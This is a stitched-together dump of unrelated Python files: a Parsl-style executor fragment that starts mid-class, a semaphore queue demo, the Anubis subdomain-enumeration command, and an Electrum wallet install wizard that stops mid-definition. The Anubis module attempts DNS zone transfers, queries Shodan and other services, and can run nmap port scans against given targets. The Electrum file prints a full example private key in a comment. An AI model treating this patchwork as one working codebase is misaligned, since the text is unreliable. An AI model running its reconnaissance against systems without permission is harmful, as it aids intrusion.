self.poll_period = poll_period self.run_dir = '.' self.worker_logdir_root = worker_logdir_root if not launch_cmd: self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} " "-a {addresses} " "-p {prefetch_capacity} " "-c {cores_per_worker} " "-m {mem_per_worker} " "--poll {poll_period} " "--task_port={task_port} " "--result_port={result_port} " "--logdir={logdir} " "--block_id={{block_id}} " "--hb_period={heartbeat_period} " "{address_probe_timeout_string} " "--hb_threshold={heartbeat_threshold} ") def initialize_scaling(self): """ Compose the launch command and call the scale_out This should be implemented in the child classes to take care of executor specific oddities. 
""" debug_opts = "--debug" if self.worker_debug else "" max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers) address_probe_timeout_string = "" if self.address_probe_timeout: address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout) worker_logdir = "{}/{}".format(self.run_dir, self.label) if self.worker_logdir_root is not None: worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label) l_cmd = self.launch_cmd.format(debug=debug_opts, prefetch_capacity=self.prefetch_capacity, address_probe_timeout_string=address_probe_timeout_string, addresses=self.all_addresses, task_port=self.worker_task_port, result_port=self.worker_result_port, cores_per_worker=self.cores_per_worker, mem_per_worker=self.mem_per_worker, max_workers=max_workers, nodes_per_block=self.provider.nodes_per_block, heartbeat_period=self.heartbeat_period, heartbeat_threshold=self.heartbeat_threshold, poll_period=self.poll_period, logdir=worker_logdir) self.launch_cmd = l_cmd logger.debug("Launch command: {}".format(self.launch_cmd)) self._scaling_enabled = True logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider) if hasattr(self.provider, 'init_blocks'): try: self.scale_out(blocks=self.provider.init_blocks) except Exception as e: logger.error("Scaling out failed: {}".format(e)) raise e def start(self): """Create the Interchange process and connect to it. """ self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range) self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range) self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range) self.is_alive = True self._queue_management_thread = None self._start_queue_management_thread() self._start_local_queue_process() logger.debug("Created management thread: {}".format(self._queue_management_thread)) self.initialize_scaling() def _queue_management_worker(self): """Listen to the queue for task status messages and handle them. Depending on the message, tasks will be updated with results, exceptions, or updates. It expects the following messages: .. code:: python { "task_id" : <task_id> "result" : serialized result object, if task succeeded ... more tags could be added later } { "task_id" : <task_id> "exception" : serialized exception object, on failure } We do not support these yet, but they could be added easily. .. code:: python { "task_id" : <task_id> "cpu_stat" : <> "mem_stat" : <> "io_stat" : <> "started" : tstamp } The `None` message is a die request. """ logger.debug("[MTHREAD] queue management worker starting") while not self.bad_state_is_set: try: msgs = self.incoming_q.get(timeout=1) except queue.Empty: logger.debug("[MTHREAD] queue empty") # Timed out. 
pass except IOError as e: logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e)) return except Exception as e: logger.exception("[MTHREAD] Caught unknown exception: {}".format(e)) return else: if msgs is None: logger.debug("[MTHREAD] Got None, exiting") return else: for serialized_msg in msgs: try: msg = pickle.loads(serialized_msg) tid = msg['task_id'] except pickle.UnpicklingError: raise BadMessage("Message received could not be unpickled") except Exception: raise BadMessage("Message received does not contain 'task_id' field") if tid == -1 and 'exception' in msg: logger.warning("Executor shutting down due to exception from interchange") exception, _ = deserialize_object(msg['exception']) self.set_bad_state_and_fail_all(exception) break task_fut = self.tasks[tid] if 'result' in msg: result, _ = deserialize_object(msg['result']) task_fut.set_result(result) elif 'exception' in msg: try: s, _ = deserialize_object(msg['exception']) # s should be a RemoteExceptionWrapper... so we can reraise it if isinstance(s, RemoteExceptionWrapper): try: s.reraise() except Exception as e: task_fut.set_exception(e) elif isinstance(s, Exception): task_fut.set_exception(s) else: raise ValueError("Unknown exception-like type received: {}".format(type(s))) except Exception as e: # TODO could be a proper wrapped exception? task_fut.set_exception( DeserializationError("Received exception, but handling also threw an exception: {}".format(e))) else: raise BadMessage("Message received is neither result or exception") if not self.is_alive: break logger.info("[MTHREAD] queue management worker finished") # When the executor gets lost, the weakref callback will wake up # the queue management thread. def weakref_cb(self, q=None): """We do not use this yet.""" q.put(None) def _start_local_queue_process(self): """ Starts the interchange process locally Starts the interchange process locally and uses an internal command queue to get the worker task and result ports that the interchange has bound to. """ comm_q = Queue(maxsize=10) self.queue_proc = Process(target=interchange.starter, args=(comm_q,), kwargs={"client_ports": (self.outgoing_q.port, self.incoming_q.port, self.command_client.port), "worker_ports": self.worker_ports, "worker_port_range": self.worker_port_range, "hub_address": self.hub_address, "hub_port": self.hub_port, "logdir": "{}/{}".format(self.run_dir, self.label), "heartbeat_threshold": self.heartbeat_threshold, "poll_period": self.poll_period, "logging_level": logging.DEBUG if self.worker_debug else logging.INFO }, daemon=True, name="HTEX-Interchange" ) self.queue_proc.start() try: (self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120) except queue.Empty: logger.error("Interchange has not completed initialization in 120s. Aborting") raise Exception("Interchange failed to start") def _start_queue_management_thread(self): """Method to start the management thread as a daemon. Checks if a thread already exists, then starts it. Could be used later as a restart if the management thread dies. 
""" if self._queue_management_thread is None: logger.debug("Starting queue management thread") self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread") self._queue_management_thread.daemon = True self._queue_management_thread.start() logger.debug("Started queue management thread") else: logger.debug("Management thread already exists, returning") def hold_worker(self, worker_id): """Puts a worker on hold, preventing scheduling of additional tasks to it. This is called "hold" mostly because this only stops scheduling of tasks, and does not actually kill the worker. Parameters ---------- worker_id : str Worker id to be put on hold """ c = self.command_client.run("HOLD_WORKER;{}".format(worker_id)) logger.debug("Sent hold request to worker: {}".format(worker_id)) return c @property def outstanding(self): outstanding_c = self.command_client.run("OUTSTANDING_C") return outstanding_c @property def connected_workers(self): workers = self.command_client.run("WORKERS") return workers @property def connected_managers(self): workers = self.command_client.run("MANAGERS") return workers def _hold_block(self, block_id): """ Sends hold command to all managers which are in a specific block Parameters ---------- block_id : str Block identifier of the block to be put on hold """ managers = self.connected_managers for manager in managers: if manager['block_id'] == block_id: logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager'])) self.hold_worker(manager['manager']) def submit(self, func, resource_specification, *args, **kwargs): """Submits work to the the outgoing_q. The outgoing_q is an external process listens on this queue for new work. This method behaves like a submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_ Args: - func (callable) : Callable function - *args (list) : List of arbitrary positional arguments. Kwargs: - **kwargs (dict) : A dictionary of arbitrary keyword args for func. Returns: Future """ if resource_specification: logger.error("Ignoring the resource specification. " "Parsl resource specification is not supported in HighThroughput Executor. 
" "Please check WorkQueueExecutor if resource specification is needed.") raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor') if self.bad_state_is_set: raise self.executor_exception self._task_counter += 1 task_id = self._task_counter # handle people sending blobs gracefully args_to_print = args if logger.getEffectiveLevel() >= logging.DEBUG: args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args]) logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print)) self.tasks[task_id] = Future() try: fn_buf = pack_apply_message(func, args, kwargs, buffer_threshold=1024 * 1024, item_threshold=1024) except TypeError: raise SerializationError(func.__name__) msg = {"task_id": task_id, "buffer": fn_buf} # Post task to the the outgoing queue self.outgoing_q.put(msg) # Return the future return self.tasks[task_id] @property def scaling_enabled(self): return self._scaling_enabled def scale_out(self, blocks=1): """Scales out the number of blocks by "blocks" Raises: NotImplementedError """ r = [] for i in range(blocks): external_block_id = str(len(self.blocks)) launch_cmd = self.launch_cmd.format(block_id=external_block_id) internal_block = self.provider.submit(launch_cmd, 1) logger.debug("Launched block {}->{}".format(external_block_id, internal_block)) if not internal_block: raise(ScalingFailed(self.provider.label, "Attempts to provision nodes via provider has failed")) r.extend([external_block_id]) self.blocks[external_block_id] = internal_block return r def scale_in(self, blocks=None, block_ids=[]): """Scale in the number of active blocks by specified amount. The scale in method here is very rude. It doesn't give the workers the opportunity to finish current tasks or cleanup. This is tracked in issue #530 Parameters ---------- blocks : int Number of blocks to terminate and scale_in by block_ids : list List of specific block ids to terminate. Optional Raises: NotImplementedError """ if block_ids: block_ids_to_kill = block_ids else: block_ids_to_kill = list(self.blocks.keys())[:blocks] # Hold the block for block_id in block_ids_to_kill: self._hold_block(block_id) # Now kill via provider to_kill = [self.blocks.pop(bid) for bid in block_ids_to_kill] r = self.provider.cancel(to_kill) return self._filter_scale_in_ids(to_kill, r) def _get_job_ids(self) -> List[object]: return list(self.blocks.values()) def shutdown(self, hub=True, targets='all', block=False): """Shutdown the executor, including all workers and controllers. This is not implemented. Kwargs: - hub (Bool): Whether the hub should be shutdown, Default: True, - targets (list of ints| 'all'): List of block id's to kill, Default: 'all' - block (Bool): To block for confirmations or not Raises: NotImplementedError """ logger.info("Attempting HighThroughputExecutor shutdown") self.queue_proc.terminate() logger.info("Finished HighThroughputExecutor shutdown attempt") return True
semaphores.py
import threading


class Queue():
    def __init__(self, n):
        self.available_spots = threading.Semaphore(n)   # free slots: blocks add() when the queue is full
        self.available_items = threading.Semaphore(0)   # filled slots: blocks pop() when the queue is empty
        self.content = []

    def add(self, x):
        self.available_spots.acquire()
        self.content.append(x)
        self.available_items.release()

    def pop(self):
        self.available_items.acquire()
        x = self.content.pop(0)
        self.available_spots.release()
        return x


def production(q, base):
    for i in range(100):
        q.add('{}.{}'.format(base, i))


def consumption(q):
    for _ in range(100):
        print(q.pop())


if __name__ == '__main__':
    q = Queue(10)
    n = 5
    prod = [threading.Thread(target=production, args=(q, i)) for i in range(n)]
    conso = [threading.Thread(target=consumption, args=(q,)) for i in range(n)]
    for t in prod:
        t.start()
    for t in conso:
        t.start()

    # TODO: increase conso
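# A minimal equivalent using the standard library (sketch): queue.Queue(maxsize=n)
# bundles the same "free slots" / "filled slots" accounting plus the internal lock,
# so put() and get() block exactly like the semaphore acquire() calls above.
#
# import queue
# q = queue.Queue(maxsize=10)
# q.put('0.0')      # blocks while the queue already holds 10 items
# print(q.get())    # blocks while the queue is empty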
target.py
"""The target command.""" import os import re import socket import sys import threading from urllib.parse import urlsplit from anubis.scanners.anubis_db import search_anubisdb, send_to_anubisdb from anubis.scanners.crt import search_crtsh from anubis.scanners.dnsdumpster import search_dnsdumpster from anubis.scanners.dnssec import dnssecc_subdomain_enum from anubis.scanners.hackertarget import subdomain_hackertarget from anubis.scanners.netcraft import search_netcraft from anubis.scanners.nmap import scan_host from anubis.scanners.recursive import recursive_search from anubis.scanners.shodan import search_shodan from anubis.scanners.spyse import search_spyse from anubis.scanners.ssl import search_subject_alt_name from anubis.scanners.sublist3r import search_sublist3r from anubis.scanners.zonetransfer import dns_zonetransfer from anubis.utils.color_print import ColorPrint from .base import Base class Target(Base): """Main enumeration module""" domains = list() dedupe = set() stdout = sys.stdout def handle_exception(self, e, message=""): if self.options["--verbose"]: print(e) if message: ColorPrint.red(message) def init(self): if self.options["FILE"]: full_path = os.path.join(os.getcwd(), self.options["FILE"]) with open(full_path) as file: self.options["TARGET"] = list(filter(None, file.read().split('\n'))) else: self.options["TARGET"] = list( filter(None, self.options["TARGET"].split(","))) # Clean up targets for i in range(len(self.options["TARGET"])): url = self.options["TARGET"][i] # Inject protocol if not there if not re.match(r'http(s?):', url): url = 'http://' + url parsed = urlsplit(url) host = parsed.netloc self.options["TARGET"][i] = host try: ip_str = socket.gethostbyname(host) ColorPrint.green(f"Searching for subdomains for {ip_str} ({host})") except Exception as e: self.handle_exception(e, "Error connecting to target! 
Make sure you spelled it correctly and it is a resolvable address") def run(self): # Retrieve IP of target and run initial configurations self.init() # If multiple targets, create scans for each for i in range(len(self.options["TARGET"])): # Default scans that run every time target = self.options["TARGET"][i] ColorPrint.green(f"Working on target: {target}") threads = [threading.Thread(target=dns_zonetransfer, args=(self, target)), threading.Thread(target=search_sublist3r, args=(self, target)), threading.Thread(target=subdomain_hackertarget, args=(self, target)), threading.Thread(target=search_subject_alt_name, args=(self, target)), threading.Thread(target=search_netcraft, args=(self, target)), threading.Thread(target=search_crtsh, args=(self, target)), threading.Thread(target=search_dnsdumpster, args=(self, target)), threading.Thread(target=search_spyse, args=(self, target)), threading.Thread(target=search_anubisdb, args=(self, target))] # Additional options - shodan.io scan if self.options["--additional-info"]: threads.append(threading.Thread(target=search_shodan, args=(self,))) # Additional options - nmap scan of dnssec script and a host/port scan if self.options["--with-nmap"]: threads.append( threading.Thread(target=dnssecc_subdomain_enum, args=(self, target))) threads.append(threading.Thread(target=scan_host, args=(self, target))) # Start all threads and wait for them to finish for x in threads: x.start() for x in threads: x.join() # Run a recursive search on each subdomain - rarely useful, but nice to have # just in case if self.options["--recursive"]: recursive_search(self) # remove duplicates and clean up self.domains = self.clean_domains(self.domains) self.dedupe = set(self.domains) print("Found", len(self.dedupe), "subdomains") print("----------------") if self.options["--ip"]: self.resolve_ips() else: for domain in self.dedupe: cleaned_domain = domain.strip() ColorPrint.green(cleaned_domain) if self.options['--silent']: sys.stdout.write(cleaned_domain + '\n', override=True) if not self.options["--dont-send-to-anubis-db"]: send_to_anubisdb(self, [target]) # reset per domain self.domains = list() def resolve_ips(self): unique_ips = set() for domain in self.dedupe: try: # Attempt to get IP resolved_ip = socket.gethostbyname(domain) except Exception as e: # If getting IP fails, fallback to empty string resolved_ip = "" # TODO - Align domains and ips in stdout ColorPrint.green(domain + ": " + resolved_ip) if self.options['--silent']: sys.stdout.write(domain + '\n', override=True) if resolved_ip: unique_ips.add(resolved_ip) print("Found %s unique IPs" % len(unique_ips)) for ip in unique_ips: # Ignore empty strings, final sanity check if ip: ColorPrint.green(ip) @staticmethod def clean_domains(domains): cleaned = [] for subdomain in domains: subdomain = subdomain.lower() if subdomain.find("//") != -1: subdomain = subdomain[subdomain.find("//") + 2:] # Some pkey return instances like example.com. - remove the final . if subdomain.endswith('.'): subdomain = subdomain[:-1] # sometimes we'll get something like /www.example.com if subdomain[0] in ["\\", ".", "/", "#", "$", "%"]: subdomain = subdomain[1:] # If it's an email address, only take the domain part if "@" in subdomain: subdomain = subdomain.split("@") # If it's an actual email like mail@example.com, take example.com if len(subdomain) > 1: subdomain = subdomain[1] else: # If for some reason it's example.com@, take example.com subdomain = subdomain[0] cleaned.append(subdomain.strip()) return cleaned
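# Illustrative inputs/outputs for clean_domains (values are hypothetical, chosen only
# to exercise each normalization branch above):
#
#   'HTTPS://Sub.Example.com'  -> 'sub.example.com'   (lower-cased, scheme stripped at '//')
#   'www.example.com.'         -> 'www.example.com'   (trailing dot removed)
#   '/mail.example.com'        -> 'mail.example.com'  (leading '/' stripped)
#   'mail@example.com'         -> 'example.com'       (domain part of an email kept)
#
# print(Target.clean_domains(['HTTPS://Sub.Example.com', 'www.example.com.',
#                             '/mail.example.com', 'mail@example.com']))
# -> ['sub.example.com', 'www.example.com', 'mail.example.com', 'example.com']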
installwizard.py
# Copyright (C) 2018 The Electrum developers # Distributed under the MIT software license, see the accompanying # file LICENCE or http://www.opensource.org/licenses/mit-license.php import os import sys import threading import traceback from typing import Tuple, List, Callable from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox, QVBoxLayout, QLineEdit, QFileDialog, QPushButton, QGridLayout, QSlider, QScrollArea) from electrum.wallet import Wallet from electrum.storage import WalletStorage from electrum.util import UserCancelled, InvalidPassword from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack from electrum.i18n import _ from .seed_dialog import SeedLayout, KeysLayout from .network_dialog import NetworkChoiceLayout from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel, InfoButton) from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\ + _("Leave this field empty if you want to disable encryption.") MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\ + _("Your wallet file does not contain secrets, mostly just metadata. ") \ + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\ + _("Note: If you enable this setting, you will need your hardware device to open your wallet.") WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' + _('A few examples') + ':\n' + 'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' + 'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' + 'p2wpkh:KxZcY47uGp9a... 
\t-> bc1q3fjfk...') # note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\ + _("You have multiple consecutive whitespaces or leading/trailing " "whitespaces in your passphrase.") + " " \ + _("This is discouraged.") + " " \ + _("Due to a bug, old versions of Electrum will NOT be creating the " "same wallet as newer versions or other software.") class CosignWidget(QWidget): size = 120 def __init__(self, m, n): QWidget.__init__(self) self.R = QRect(0, 0, self.size, self.size) self.setGeometry(self.R) self.setMinimumHeight(self.size) self.setMaximumHeight(self.size) self.m = m self.n = n def set_n(self, n): self.n = n self.update() def set_m(self, m): self.m = m self.update() def paintEvent(self, event): bgcolor = self.palette().color(QPalette.Background) pen = QPen(bgcolor, 7, Qt.SolidLine) qp = QPainter() qp.begin(self) qp.setPen(pen) qp.setRenderHint(QPainter.Antialiasing) qp.setBrush(Qt.gray) for i in range(self.n): alpha = int(16* 360 * i/self.n) alpha2 = int(16* 360 * 1/self.n) qp.setBrush(Qt.green if i<self.m else Qt.gray) qp.drawPie(self.R, alpha, alpha2) qp.end() def wizard_dialog(func): def func_wrapper(*args, **kwargs): run_next = kwargs['run_next'] wizard = args[0] wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel')) try: out = func(*args, **kwargs) except GoBack: wizard.go_back() if wizard.can_go_back() else wizard.close() return except UserCancelled: return #if out is None: # out = () if type(out) is not tuple: out = (out,) run_next(*out) return func_wrapper # WindowModalDialog must come first as it overrides show_error class InstallWizard(QDialog, MessageBoxMixin, BaseWizard): accept_signal = pyqtSignal() def __init__(self, config, app, plugins, storage): BaseWizard.__init__(self, config, plugins, storage) QDialog.__init__(self, None) self.setWindowTitle('Electrum - ' + _('Install Wizard')) self.app = app self.config = config # Set for base base class self.language_for_seed = config.get('language') self.setMinimumSize(600, 400) self.accept_signal.connect(self.accept) self.title = QLabel() self.main_widget = QWidget() self.back_button = QPushButton(_("Back"), self) self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel')) self.next_button = QPushButton(_("Next"), self) self.next_button.setDefault(True) self.logo = QLabel() self.please_wait = QLabel(_("Please wait...")) self.please_wait.setAlignment(Qt.AlignCenter) self.icon_filename = None self.loop = QEventLoop() self.rejected.connect(lambda: self.loop.exit(0)) self.back_button.clicked.connect(lambda: self.loop.exit(1)) self.next_button.clicked.connect(lambda: self.loop.exit(2)) outer_vbox = QVBoxLayout(self) inner_vbox = QVBoxLayout() inner_vbox.addWidget(self.title) inner_vbox.addWidget(self.main_widget) inner_vbox.addStretch(1) inner_vbox.addWidget(self.please_wait) inner_vbox.addStretch(1) scroll_widget = QWidget() scroll_widget.setLayout(inner_vbox) scroll = QScrollArea() scroll.setWidget(scroll_widget) scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff) scroll.setWidgetResizable(True) icon_vbox = QVBoxLayout() icon_vbox.addWidget(self.logo) icon_vbox.addStretch(1) hbox = QHBoxLayout() hbox.addLayout(icon_vbox) hbox.addSpacing(5) hbox.addWidget(scroll) hbox.setStretchFactor(scroll, 1) outer_vbox.addLayout(hbox) outer_vbox.addLayout(Buttons(self.back_button, self.next_button)) self.set_icon('electrum.png') self.show() self.raise_() self.refresh_gui() # Need for QT on MacOSX. Lame. 
def select_storage(self, path, get_wallet_from_daemon): vbox = QVBoxLayout() hbox = QHBoxLayout() hbox.addWidget(QLabel(_('Wallet') + ':')) self.name_e = QLineEdit() hbox.addWidget(self.name_e) button = QPushButton(_('Choose...')) hbox.addWidget(button) vbox.addLayout(hbox) self.msg_label = QLabel('') vbox.addWidget(self.msg_label) hbox2 = QHBoxLayout() self.pw_e = QLineEdit('', self) self.pw_e.setFixedWidth(150) self.pw_e.setEchoMode(2) self.pw_label = QLabel(_('Password') + ':') hbox2.addWidget(self.pw_label) hbox2.addWidget(self.pw_e) hbox2.addStretch() vbox.addLayout(hbox2) self.set_layout(vbox, title=_('Electrum wallet')) self.storage = WalletStorage(path, manual_upgrades=True) wallet_folder = os.path.dirname(self.storage.path) def on_choose(): path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if path: self.name_e.setText(path) def on_filename(filename): path = os.path.join(wallet_folder, filename) wallet_from_memory = get_wallet_from_daemon(path) try: if wallet_from_memory: self.storage = wallet_from_memory.storage else: self.storage = WalletStorage(path, manual_upgrades=True) self.next_button.setEnabled(True) except BaseException: traceback.print_exc(file=sys.stderr) self.storage = None self.next_button.setEnabled(False) if self.storage: if not self.storage.file_exists(): msg =_("This file does not exist.") + '\n' \ + _("Press 'Next' to create this wallet, or choose another file.") pw = False elif not wallet_from_memory: if self.storage.is_encrypted_with_user_pw(): msg = _("This file is encrypted with a password.") + '\n' \ + _('Enter your password or choose another file.') pw = True elif self.storage.is_encrypted_with_hw_device(): msg = _("This file is encrypted using a hardware device.") + '\n' \ + _("Press 'Next' to choose device to decrypt.") pw = False else: msg = _("Press 'Next' to open this wallet.") pw = False else: msg = _("This file is already open in memory.") + "\n" \ + _("Press 'Next' to create/focus window.") pw = False else: msg = _('Cannot read file') pw = False self.msg_label.setText(msg) if pw: self.pw_label.show() self.pw_e.show() self.pw_e.setFocus() else: self.pw_label.hide() self.pw_e.hide() button.clicked.connect(on_choose) self.name_e.textChanged.connect(on_filename) n = os.path.basename(self.storage.path) self.name_e.setText(n) while True: if self.loop.exec_() != 2: # 2 = next return if self.storage.file_exists() and not self.storage.is_encrypted(): break if not self.storage.file_exists(): break wallet_from_memory = get_wallet_from_daemon(self.storage.path) if wallet_from_memory: return wallet_from_memory if self.storage.file_exists() and self.storage.is_encrypted(): if self.storage.is_encrypted_with_user_pw(): password = self.pw_e.text() try: self.storage.decrypt(password) break except InvalidPassword as e: QMessageBox.information(None, _('Error'), str(e)) continue except BaseException as e: traceback.print_exc(file=sys.stdout) QMessageBox.information(None, _('Error'), str(e)) return elif self.storage.is_encrypted_with_hw_device(): try: self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET) except InvalidPassword as e: QMessageBox.information( None, _('Error'), _('Failed to decrypt using this hardware device.') + '\n' + _('If you use a passphrase, make sure it is correct.')) self.reset_stack() return self.select_storage(path, get_wallet_from_daemon) except BaseException as e: traceback.print_exc(file=sys.stdout) QMessageBox.information(None, _('Error'), str(e)) return if self.storage.is_past_initial_decryption(): break 
else: return else: raise Exception('Unexpected encryption version') return True def run_and_get_wallet(self): path = self.storage.path if self.storage.requires_split(): self.hide() msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n" "Do you want to split your wallet into multiple files?").format(path) if not self.question(msg): return file_list = '\n'.join(self.storage.split_accounts()) msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path if self.question(msg): os.remove(path) self.show_warning(_('The file was removed')) return action = self.storage.get_action() if action and action not in ('new', 'upgrade_storage'): self.hide() msg = _("The file '{}' contains an incompletely created wallet.\n" "Do you want to complete its creation now?").format(path) if not self.question(msg): if self.question(_("Do you want to delete '{}'?").format(path)): os.remove(path) self.show_warning(_('The file was removed')) return self.show() if action: # self.wallet is set in run self.run(action) return self.wallet self.wallet = Wallet(self.storage) return self.wallet def finished(self): """Called in hardware client wrapper, in order to close popups.""" return def on_error(self, exc_info): if not isinstance(exc_info[1], UserCancelled): traceback.print_exception(*exc_info) self.show_error(str(exc_info[1])) def set_icon(self, filename): prior_filename, self.icon_filename = self.icon_filename, filename self.logo.setPixmap(QPixmap(icon_path(filename)) .scaledToWidth(60, mode=Qt.SmoothTransformation)) return prior_filename def set_layout(self, layout, title=None, next_enabled=True): self.title.setText("<b>%s</b>"%title if title else "") self.title.setVisible(bool(title)) # Get rid of any prior layout by assigning it to a temporary widget prior_layout = self.main_widget.layout() if prior_layout: QWidget().setLayout(prior_layout) self.main_widget.setLayout(layout) self.back_button.setEnabled(True) self.next_button.setEnabled(next_enabled) if next_enabled: self.next_button.setFocus() self.main_widget.setVisible(True) self.please_wait.setVisible(False) def exec_layout(self, layout, title=None, raise_on_cancel=True, next_enabled=True): self.set_layout(layout, title, next_enabled) result = self.loop.exec_() if not result and raise_on_cancel: raise UserCancelled if result == 1: raise GoBack from None self.title.setVisible(False) self.back_button.setEnabled(False) self.next_button.setEnabled(False) self.main_widget.setVisible(False) self.please_wait.setVisible(True) self.refresh_gui() return result def refresh_gui(self): # For some reason, to refresh the GUI this needs to be called twice self.app.processEvents() self.app.processEvents() def remove_from_recently_open(self, filename): self.config.remove_from_recently_open(filename) def text_input(self, title, message, is_valid, allow_multi=False): slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid, allow_multi=allow_multi) self.exec_layout(slayout, title, next_enabled=False) return slayout.get_text() def seed_input(self, title, message, is_seed, options): slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self) self.exec_layout(slayout, title, next_enabled=False) return slayout.get_seed(), slayout.is_bip39, slayout.is_ext @wizard_dialog def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False): header_layout = QHBoxLayout() label = WWLabel(message) 
label.setMinimumWidth(400) header_layout.addWidget(label) if show_wif_help: header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) return self.text_input(title, header_layout, is_valid, allow_multi) @wizard_dialog def add_cosigner_dialog(self, run_next, index, is_valid): title = _("Add Cosigner") + " %d"%index message = ' '.join([ _('Please enter the master public key (xpub) of your cosigner.'), _('Enter their master private key (xprv) if you want to be able to sign for them.') ]) return self.text_input(title, message, is_valid) @wizard_dialog def restore_seed_dialog(self, run_next, test): options = [] if self.opt_ext: options.append('ext') if self.opt_bip39: options.append('bip39') title = _('Enter Seed') message = _('Please enter your seed phrase in order to restore your wallet.') return self.seed_input(title, message, test, options) @wizard_dialog def confirm_seed_dialog(self, run_next, test): self.app.clipboard().clear() title = _('Confirm Seed') message = ' '.join([ _('Your seed is important!'), _('If you lose your seed, your money will be permanently lost.'), _('To make sure that you have properly saved your seed, please retype it here.') ]) seed, is_bip39, is_ext = self.seed_input(title, message, test, None) return seed @wizard_dialog def show_seed_dialog(self, run_next, seed_text): title = _("Your wallet generation seed is:") slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext']) self.exec_layout(slayout) return slayout.is_ext def pw_layout(self, msg, kind, force_disable_encrypt_cb): playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button, force_disable_encrypt_cb=force_disable_encrypt_cb) playout.encrypt_cb.setChecked(True) self.exec_layout(playout.layout()) return playout.new_password(), playout.encrypt_cb.isChecked() @wizard_dialog def request_password(self, run_next, force_disable_encrypt_cb=False): """Request the user enter a new password and confirm it. 
Return the password or None for no password.""" return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb) @wizard_dialog def request_storage_encryption(self, run_next): playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION) playout.encrypt_cb.setChecked(True) self.exec_layout(playout.layout()) return playout.encrypt_cb.isChecked() @wizard_dialog def confirm_dialog(self, title, message, run_next): self.confirm(message, title) def confirm(self, message, title): label = WWLabel(message) vbox = QVBoxLayout() vbox.addWidget(label) self.exec_layout(vbox, title) @wizard_dialog def action_dialog(self, action, run_next): self.run(action) def terminate(self): self.accept_signal.emit() def waiting_dialog(self, task, msg, on_finished=None): label = WWLabel(msg) vbox = QVBoxLayout() vbox.addSpacing(100) label.setMinimumWidth(300) label.setAlignment(Qt.AlignCenter) vbox.addWidget(label) self.set_layout(vbox, next_enabled=False) self.back_button.setEnabled(False) t = threading.Thread(target=task) t.start() while True: t.join(1.0/60) if t.is_alive(): self.refresh_gui() else: break if on_finished: on_finished() @wizard_dialog def choice_dialog(self, title, message, choices, run_next): c_values = [x[0] for x in choices] c_titles = [x[1] for x in choices] clayout = ChoicesLayout(message, c_titles) vbox = QVBoxLayout() vbox.addLayout(clayout.layout()) self.exec_layout(vbox, title) action = c_values[clayout.selected_index()] return action def query_choice(self, msg, choices): """called by hardware wallets""" clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout() vbox.addLayout(clayout.layout()) self.exec_layout(vbox, '') return clayout.selected_index() @wizard_dialog def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]], message2: str, test_text: Callable[[str], int], run_next, default_choice_idx: int=0) -> Tuple[str, str]: vbox = QVBoxLayout() c_values = [x[0] for x in choices] c_titles = [x[1] for x in choices] c_default_text = [x[2] for x in choices] def on_choice_click(clayout): idx = clayout.selected_index() line.setText(c_default_text[idx]) clayout = ChoicesLayout(message1, c_titles, on_choice_click, checked_index=default_choice_idx) vbox.addLayout(clayout.layout()) vbox.addSpacing(50) vbox.addWidget(WWLabel(message2)) line = QLineEdit() def on_text_change(text): self.next_button.setEnabled(test_text(text)) line.textEdited.connect(on_text_change) on_choice_click(clayout) # set default text for "line" vbox.addWidget(line) self.exec_layout(vbox, title) choice = c_values[clayout.selected_index()] return str(line.text()), choice @wizard_dialog def line_dialog(self, run_next, title, message, default, test, warning='', 